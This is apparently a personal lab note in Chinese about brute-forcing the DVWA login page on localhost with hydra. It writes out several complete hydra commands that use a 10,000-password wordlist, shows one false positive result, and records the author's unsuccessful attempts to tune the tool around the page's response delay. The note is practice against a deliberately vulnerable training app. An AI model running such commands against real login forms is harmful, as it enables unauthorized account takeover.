<aside> 💡 Turn on dark 🌒 mode with cmd/ctrl + shift + L
</aside>
試著送出表單,後端回應的時間明顯有延遲 2 秒
一樣用 hydra 試試看
hydra -V \\
-l admin \\
-P 10-million-password-list-top-10000.txt \\
-s 8086 \\
-f localhost \\
http-form-get "/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."
admin:123456
但在測試後發現密碼不對,代表 hydra 受到延遲的影響而誤判了,可能要刻意延遲送出才行
雖然加上了跟延遲相關的參數,hydra 用起來還是有些怪怪的,有時候找不到正確的密碼,每次結果都不同 @@,將難度調回 low 重測也是一樣 QQ,可能要用別的工具試試看
hydra -e ns -F -t 1 -W 5 \\
-v -V \\
-l admin \\
-P 10-million-password-list-top-10000.txt \\
-s 8086 \\
-f localhost \\
http-form-get \\
"/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."
hydra -V -t 1 -c 3 -l admin -P 10-million-password-list-top-10000.txt -s 8086 -f localhost http-form-get "/vulnerabilities/brute/?:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect."